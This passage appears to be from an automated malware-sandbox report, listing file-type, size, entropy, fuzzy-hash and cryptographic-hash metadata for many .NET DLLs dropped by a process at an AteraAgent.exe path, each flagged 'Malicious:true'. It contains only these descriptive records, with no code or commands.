                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.849726398461054
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:XRbzriaXT+WlEWENyb8E9VF6IYinAM+oCri+tJRD:B7icWEpYinAMxCu87D
                                                                                                                                                                                                                                        MD5:F97C039A3E96C77AC1A630EC88882FFB
                                                                                                                                                                                                                                        SHA1:999D4A9AA0F5F3296F4E3928007BB8DA9EC265D6
                                                                                                                                                                                                                                        SHA-256:BC74D51552697CEB7FD7965968F1747A5788F1B074B3370F5A555DAF97FA858F
                                                                                                                                                                                                                                        SHA-512:EC271F5672C75FA186E213160DDB7950A02F643E3817232E8F4E4123D4BF4EB1D03F67290A66BDCE54949AF8B34BE31437E16E8125A6BEFCDB42DB057C7FD47A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):148528
                                                                                                                                                                                                                                        Entropy (8bit):5.418393253179765
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:5HOdYYWg+GImdMEGK61wb5nx03LBblQ6Ndk66byYSI4Zki+BReD4pK/uYxtl+97r:0dYO+3m9R6e1x03BZ6bDSzZ8B0uAP+9/
                                                                                                                                                                                                                                        MD5:13C67BC8DC75E286564EEE86EEDB79E3
                                                                                                                                                                                                                                        SHA1:5E243FB69165BCA0873F3F6363D99D580962D334
                                                                                                                                                                                                                                        SHA-256:A1820496128C7FBD77F01C3FC7BACEEE764123FF24FD700BDE3D466F99235649
                                                                                                                                                                                                                                        SHA-512:440B799AA99F89C8B982D2A2122F1FF9F33AB696D0F8BB6BF7735052205A60604EDF98A4FF421B77A5BE565040A0E31D9540B67EB6A336F6B1EBDECFA55F81E9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.8135579418002825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:oRtRWjYW2Nyb8E9VF6IYinAM+oCIfRtED:CisEpYinAMxC7D
                                                                                                                                                                                                                                        MD5:15E2AA96A387B53B1195DC8B487E686A
                                                                                                                                                                                                                                        SHA1:9731DD11A7486D0715DFAC700C05E6CA94FDB0C6
                                                                                                                                                                                                                                        SHA-256:94131C844DD5B5563CB8459359819FFBF0725C6F1BD533350BF2A7EFF67673B2
                                                                                                                                                                                                                                        SHA-512:D4CC4E17F9FB116F244523F943CBC2FECDC76F7DC929632A2DE70444EC3459219C5A0EF57F860CC93CEB270267DEADE000E8040538EEB650A999507F36A6DEF3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8943214940791755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:YFxrIFWnoW5HBNyby2sE9jBF6IYiYF8pA5K+oCGUHFK1+JmWQTuB:oeWnoWXNyb8E9VF6IYinAM+oCG1+MlTQ
                                                                                                                                                                                                                                        MD5:261F2246AA5B2D82C261E6769DC07C17
                                                                                                                                                                                                                                        SHA1:7F2A8B7D7F91572197B7802D848FDBBF6859F691
                                                                                                                                                                                                                                        SHA-256:530B111070585C9BC8E0CE8E16B79E1D4E5D9D34FB8B220C4A1CD82EE704FC16
                                                                                                                                                                                                                                        SHA-512:DFE74576543A16A39834C26CCC1FA97A90DC52B7560D661B4C707CF9D0AC0889FDD75F87C769A8FFB2094BA1EC747CF14764382CA8832539617663F33A702704
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):99376
                                                                                                                                                                                                                                        Entropy (8bit):6.2372383902585335
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:qnDoXrtUaK/XIg+rZAXj8s9HaWt9LuOw9VHHV55aTwWbU7Hxl+xz:yitRK/XIgIZAXjD96WfLtGdM5bU4z
                                                                                                                                                                                                                                        MD5:D1BD4C35E7096B4D37A9E1D28F07B6D7
                                                                                                                                                                                                                                        SHA1:44C2DAD4FED91F42C528E2401DEE8FC4EFFBD642
                                                                                                                                                                                                                                        SHA-256:0D72569962DFCE056AF62C80C69CCD46938559D85632DB2EC51AD10792A84569
                                                                                                                                                                                                                                        SHA-512:68211D7E4FB53C75D1906BEB7D5CBD7C78414151B7D56FBF515922CA1529026B93DAA2FAEF4FD6136DB28E5423EE0D91D7E8935FB7A8856B4630103EDB9093D1
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.854870253306322
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ExGxIZWJjW55NNyby2sE9jBF6IYiYF8pA5K+oCGUHFykqTB/c:E6oWJjWZNyb8E9VF6IYinAM+oCukiB0
                                                                                                                                                                                                                                        MD5:B9FB4621FAF445285157D22A7257FEA0
                                                                                                                                                                                                                                        SHA1:CFF35D37272E4723A2B201F1AA8323F1A6C48C00
                                                                                                                                                                                                                                        SHA-256:374BB9F514AA662F04156A1E7D5860F0A361873112280C816FD142C7C616FB8D
                                                                                                                                                                                                                                        SHA-512:C4C1D20A291E3800287E4D70A23201EB3310A755D54D373D7E61CA5ECA411E36C1604172BC2177F656099C0CD3D10192035A2499F49C31EE33A294EAE32891C5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.776479306655139
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Zqk53/hW3fZ+zW3Nyb8E9VF6IYinAM+oCjIysP:Zqk53MXEpYinAMxCQP
                                                                                                                                                                                                                                        MD5:7A1456584B0BAF903279B7D247BABB43
                                                                                                                                                                                                                                        SHA1:5762A8366ADE1F848D46498C46954173008A73AC
                                                                                                                                                                                                                                        SHA-256:7123B1F3DA6140B25AE2694392E2E0F5EF0A9CFA3992C335B994B24C2AD2EF6D
                                                                                                                                                                                                                                        SHA-512:EC29AC1C520D902C7EC1CA9D927B1C611B7B4421F5B8C17BFE741BA0B149CE3902A4294381806CF8A759DBA7D2415A1EEFD564A76463DB69ECF2F6C5A0C36296
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.662827631552611
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:TFCc4Y4OJWfOWqWWOWyNyb8E9VF6IYinAM+oCwOI7Mm:RCcyCCEpYinAMxCS5
                                                                                                                                                                                                                                        MD5:86A5C92C0527099B6377C148027695F4
                                                                                                                                                                                                                                        SHA1:11B5E8A412019AE590A1FD652C70BC6E72A97FAC
                                                                                                                                                                                                                                        SHA-256:3DF1788519270E0DDB46FD9ADA72372CAAA30D9D0D76063C10FFF8485F2BBEA1
                                                                                                                                                                                                                                        SHA-512:208395BE8A99CEE3ABC16D4DFB3CE9D8338CC1CA45CE4A694387F720EE5B2104F32647E883AD79F5C9171743EF11CDCB177D553C59703949922ED2DA06A58F84
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8756333541081425
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:mlTx93aWxMW5VwNyby2sE9jBF6IYiYF8pA5K+oCGUHFwPtrnA3kF:OAWxMWANyb8E9VF6IYinAM+oCMPtrAM
                                                                                                                                                                                                                                        MD5:7654A03102D2347DC650BBB71AFA19B6
                                                                                                                                                                                                                                        SHA1:171A743C78312873B219B07D7A4BD7FE79D8E3D5
                                                                                                                                                                                                                                        SHA-256:9870BD7C4A414CFA489AE9376052EAD01E466F6830D0AC0CA25EA7C832C41287
                                                                                                                                                                                                                                        SHA-512:56922093636DA3FA7553410C046EF0BE8203561017EC37CAB8EEC7005E8C687570EEAE738386CDE2295C649AD2DFC9111F075E9137D1016E21391D914FED7BB6
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.855800500607429
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:qYqArxbYWHaW5uiNyby2sE9jBF6IYiYF8pA5K+oCGUHF2zfxGLIDjG:oAlcWHaWBNyb8E9VF6IYinAM+oCyo6jG
                                                                                                                                                                                                                                        MD5:66B18072E7D73E62FD84672045F10393
                                                                                                                                                                                                                                        SHA1:0A38E8A91078136B0A1FB060F668A1D53E14A10F
                                                                                                                                                                                                                                        SHA-256:51CDE5B98E57EF67273033A76DB3D3BA0939A587A607E88FA40AEEA79B711417
                                                                                                                                                                                                                                        SHA-512:3C7B28D8E2A9A7F5B1FD72967BC2551DCDBDFA526F1CA85C37D6CAF9AEC5689DDECB8D9B04DA9B94C424262EFBE1A11D7901619137B494740A1320C47DD3DD0E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.779047335520254
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:uGIZnWlNWmNyb8E9VF6IYinAM+oCpcstae:rUyxEpYinAMxCPp
                                                                                                                                                                                                                                        MD5:014D304446EDC947EC60BB1A1CC2A2C2
                                                                                                                                                                                                                                        SHA1:BD2639F2A39506B0B9CFD83BA55E9E0A6797E64E
                                                                                                                                                                                                                                        SHA-256:994621C4143B78A5CBA907E7385FD3C64069811935D935FF0E5EE4830B960EB2
                                                                                                                                                                                                                                        SHA-512:6EDF9553F1AC9AC3259026733A4B58E8A390A0BF674B916CA3B63AEF3B27B2FCE5F0DD8687EF375E4A381C29874A761DA1F986133E5FBDA6DBA4F66DE984A594
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25648
                                                                                                                                                                                                                                        Entropy (8bit):6.495579016953834
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:WlQnCMi33333333kj8xe+5PTYM3zUy+CezHjzgKj0uRWOdWmWJdW8Nyb8E9VF6IO:MQq33333333kX+TBi8rEpYinAMxC/r
                                                                                                                                                                                                                                        MD5:13AD2492EF144307BD62295000E7C617
                                                                                                                                                                                                                                        SHA1:246C63C5FDD16E2CE86D83A2591E7654F7E0897C
                                                                                                                                                                                                                                        SHA-256:08AD05026C272D6A1EC3F8C8775CC03C8210A98DC57CF011721F5AE90005CD17
                                                                                                                                                                                                                                        SHA-512:C94B5BFE999C52547F0499948C5E067455E2046F4E304E18679A53F3631A16CFD54473BE4E5183A5E10ED3C1529744276A24EB164C61A69020C6DC79D44768EF
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.850005552827602
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:a28YFlXulWY/WnNyb8E9VF6IYinAM+oCKD9mN:a0q6EpYinAMxCz
                                                                                                                                                                                                                                        MD5:B34A2DA21F5F476FD93889AD2A4648F8
                                                                                                                                                                                                                                        SHA1:F0A866A4F09D38E880FDE0FB6EB07054BA26D1CD
                                                                                                                                                                                                                                        SHA-256:CBD05B0C1CD7CAF8162492BB38838DF090DA44114650F7F1254C41B7BF584A00
                                                                                                                                                                                                                                        SHA-512:DFB23B2B304F9A88333BCBD0AC8E820DF55AFB1205CDA8A484BAA779D9C4F07767B5AFEBF64C3F5A3BADF89C0A0AC1A1FBDCF196D92E3A4E860A8AF622080BD4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16432
                                                                                                                                                                                                                                        Entropy (8bit):6.7278844961933855
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:+uMLcdQ5MW9MWBNyb8E9VF6IYinAM+oC394UE:DOcSpLEpYinAMxCnE
                                                                                                                                                                                                                                        MD5:DB4150E9A696E25DC123A77944961531
                                                                                                                                                                                                                                        SHA1:189D482C83909E889E519C385EEAC93177B3FE39
                                                                                                                                                                                                                                        SHA-256:33B63F824930EB98A889D477A3DD9D63D99E77CE375EA312783198DFF820CE52
                                                                                                                                                                                                                                        SHA-512:CDF82F087BB88097C7A6543A79D3A836685A249E1B548EAC3CFAAC440457C6A4C0599AD2A6C87F1EDD8B6D4B3CB1551F37FD1F0630BEC0A5FF93AA05CD476083
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15920
                                                                                                                                                                                                                                        Entropy (8bit):6.817416809900282
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:wZ7RqXWDRqlRqj0RqFWVNyb8E9VF6IYinAM+oCVacern:E9qKqjqjuqOEpYinAMxCwz
                                                                                                                                                                                                                                        MD5:FC18F7BD5DCE6188868A593297A49CB9
                                                                                                                                                                                                                                        SHA1:A456A5BA6F2001959B2F3B45681FBEF43787C648
                                                                                                                                                                                                                                        SHA-256:CB010ECC7CD90070E926B3C3104F8ECDB3A12CB16A75A43AD17E85A5475B4433
                                                                                                                                                                                                                                        SHA-512:E4AE55F293706C514F80139B50A9543BCFCC2C57547DE49DCDFF7138525F96532FFAA1AE938CCB731DCB309926F58F69152E78FDD0AE4DF34F10AC04CAB23D87
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20016
                                                                                                                                                                                                                                        Entropy (8bit):6.628529042861803
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:/NBMbljRC+lgfS1RPWYR1Rw0R9WYRPWYRDRj0R9WSNyb8E9VF6IYinAM+oC3kNGJ:/vMhF2SzNzwu/NljuREpYinAMxCYc
                                                                                                                                                                                                                                        MD5:0A338CB89DE750A28B7A32505E756E1C
                                                                                                                                                                                                                                        SHA1:E8C91FB2ADC63DE4B95D9C7B77D2B6F13155A94D
                                                                                                                                                                                                                                        SHA-256:94AB5B19CD4006326DA38616D0F0FA38B7877996456FA6762FE6E63F2D3EEA28
                                                                                                                                                                                                                                        SHA-512:DA5EE2E05B4DF2D606E358A6F175C08D96070EAC583F98A2D14CED82859B6B8C6EDE98E78AFA44C0FC0C4B42FEC467789A68C50E19C7015F03EFF62C129790F0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.901982040259458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:rZ4RLWdRfRJ0RZWuNyb8E9VF6IYinAM+oClyIw:rZK0pJu5EpYinAMxCoV
                                                                                                                                                                                                                                        MD5:5B6944584BF4FB195EC78FB784FE00C9
                                                                                                                                                                                                                                        SHA1:FC424293203C3F548350C2DF926ADA9661C9A58D
                                                                                                                                                                                                                                        SHA-256:4B7C21A0B17ABE309DE7D13E19121AFBD500DA18E3CE24B458BAC75B76964617
                                                                                                                                                                                                                                        SHA-512:1F823487A61983740FC5BCBEADFFFCB6BD98079BF0CA5B49C0A2AAFB79271360B3D50D0DE61D68C210E0D5FC41B5BD77A5301DD88AD5E781C7EA93733A440185
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.796826114342678
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:BFx+WTIEfW50ANyby2sE9jBF6IYiYF8pA5K+oCGUHFz9ZIT8Vo1t:3YWsmW5Nyb8E9VF6IYinAM+oC39m4Ct
                                                                                                                                                                                                                                        MD5:61F8B8156F47D9B9015836E9A54764EF
                                                                                                                                                                                                                                        SHA1:119E781B2E161CFEB429A66FC2B967568CA66737
                                                                                                                                                                                                                                        SHA-256:51E5356D46C5201333603612E2645D6A57001EC39236D63C768B5E166803BA89
                                                                                                                                                                                                                                        SHA-512:1F4A962B86D75EBA7BDE6CAF1633BEEDC9135D842B1AFDE4F3654A330BEF6278774D4F15CF553F65E2C495A65B55851CCD1BDD35611832A4C4D2AD33EAF2FD7F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):105008
                                                                                                                                                                                                                                        Entropy (8bit):6.382489232559774
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:rvc/U5yNq2oS4Zd0LE3YigSFvhoZO2K3aAYH2TfXmNoJXW7Hx37:Lgk1tiLMYiDFvxqrWDWNoJXWR7
                                                                                                                                                                                                                                        MD5:92B40FA097AF4C396915B768230B1ABE
                                                                                                                                                                                                                                        SHA1:5CCE8D2763344647A77EB3543C2D9693BA3161DD
                                                                                                                                                                                                                                        SHA-256:21CE4C2841415442B62973B447FEEBB82341EF92FC4A852BC1FD87437B3F85BB
                                                                                                                                                                                                                                        SHA-512:4FA3DDEDA45CCEF80F23527AFCFD52C32E29A2C58083884F09A018D9F8FC5969EF3B2C1681963053816C4A9C476A26A3796D2BAECD68B9C19CFEC76D3C6498A8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.855519530441361
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:BKcuz1W1cWMNyb8E9VF6IYinAM+oCLn3b:bu86EpYinAMxCbr
                                                                                                                                                                                                                                        MD5:D3AB242ED33C56AB362F290A4404EC49
                                                                                                                                                                                                                                        SHA1:D0152BFAD70CC88745CCBAFCFCA21EFFDA23FFBF
                                                                                                                                                                                                                                        SHA-256:671804049A40885C30E447ED33031E4471D1FE2DB47F312A2E10182FECA64442
                                                                                                                                                                                                                                        SHA-512:F6582A7013B3022326E02C89A8E2B7DBA320BEFDC611F194850A64D29CDF420A63A5C5785610DC77F26B3A42B6995B85FF9A13917C3F01E2F3E1512234F38294
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.860759859303493
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:NpXYpxjSSWikW5I0Nyby2sE9jBF6IYiYF8pA5K+oCGUHFUd79eOJZWz3:i+SWikWBNyb8E9VF6IYinAM+oCAd57O
                                                                                                                                                                                                                                        MD5:E9BEB1736F3761618A4A2AC73F81E6F3
                                                                                                                                                                                                                                        SHA1:BC2268CBA28C36257846A9359E6ADBF737483710
                                                                                                                                                                                                                                        SHA-256:A7F932F2728E70F18A0BAC54FA738DEE4E8A52805A3CC10315A1C8A0B0B0F296
                                                                                                                                                                                                                                        SHA-512:DCAD6607C0923A15CD66C74A5867CAF7B8EF3B68AE6D9FF10A05368EEEFDE92395B74942B884F0AB53C3238F32A21AD5068F5E489FAAEA5C95DD12887644407F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.908741291375105
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:YDxxhREWzgW5mGNyby2sE9jBF6IYiYF8pA5K+oCGUHF76amadfTUfJ:MAWzgWlNyb8E9VF6IYinAM+oCXffTUfJ
                                                                                                                                                                                                                                        MD5:9F74A58B45EDD0ADB5CDB20541666B50
                                                                                                                                                                                                                                        SHA1:9079C0E87514FA9739DA566F3493790CEDEF1E8E
                                                                                                                                                                                                                                        SHA-256:6FD266CE85C9637BE043278A24A4ED410D02A81B7B6E8C44390E659F0C67CFDC
                                                                                                                                                                                                                                        SHA-512:7F6DD752F8FEEB782C31375787981546384623806A9B56C5953050576F5B81E46DA5E8FC3B796BA6D7866FCE63F7990678ECEEFC7BBCA8F526C4BE67CCF38ABD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.8673161701513905
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:0BLRWbYWAjNyb8E9VF6IYinAM+oC7c2zJ:0B26/EpYinAMxCYKJ
                                                                                                                                                                                                                                        MD5:374E3295625421E27300822C6A7C8A2F
                                                                                                                                                                                                                                        SHA1:71A298127AD4469B838BC34A6610FE3E15FEF6D6
                                                                                                                                                                                                                                        SHA-256:59F98B1461F3B4D12C8AD3F71CB8A183F0BC985BC71C6CBABF6D143EE7D9E1D3
                                                                                                                                                                                                                                        SHA-512:9BB2A8B0FC8153E79143FDB11F010CE22895D6F1521DB5F6FDE49FDD10A7F5C502C29D4D70459B2F8E5976360AE3AC8267DB07564EE9D8F8824FA20CD333F882
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.852435714145632
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:KZxcMRW4/W5x9Nyby2sE9jBF6IYiYF8pA5K+oCGUHFyF5FQEEX:KHW4/WRNyb8E9VF6IYinAM+oC+iEEX
                                                                                                                                                                                                                                        MD5:41858594F019A9363968AD51A111F139
                                                                                                                                                                                                                                        SHA1:4ED3F99C726D44459E555F0320F75EDB01CD84AC
                                                                                                                                                                                                                                        SHA-256:6E257268CFD9327471BDD3C11D9067C1D3BA647CB662BCC40C6F9E45C24CF199
                                                                                                                                                                                                                                        SHA-512:96518CF69E710065C8FDCBCC412F23BD56F1FE84D98A20E0D876A529CA4DC8F749BB51AC2C9E730515FF141459D36590DD55388115DDBA64809EC1EB738A057B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15408
                                                                                                                                                                                                                                        Entropy (8bit):6.912298773762876
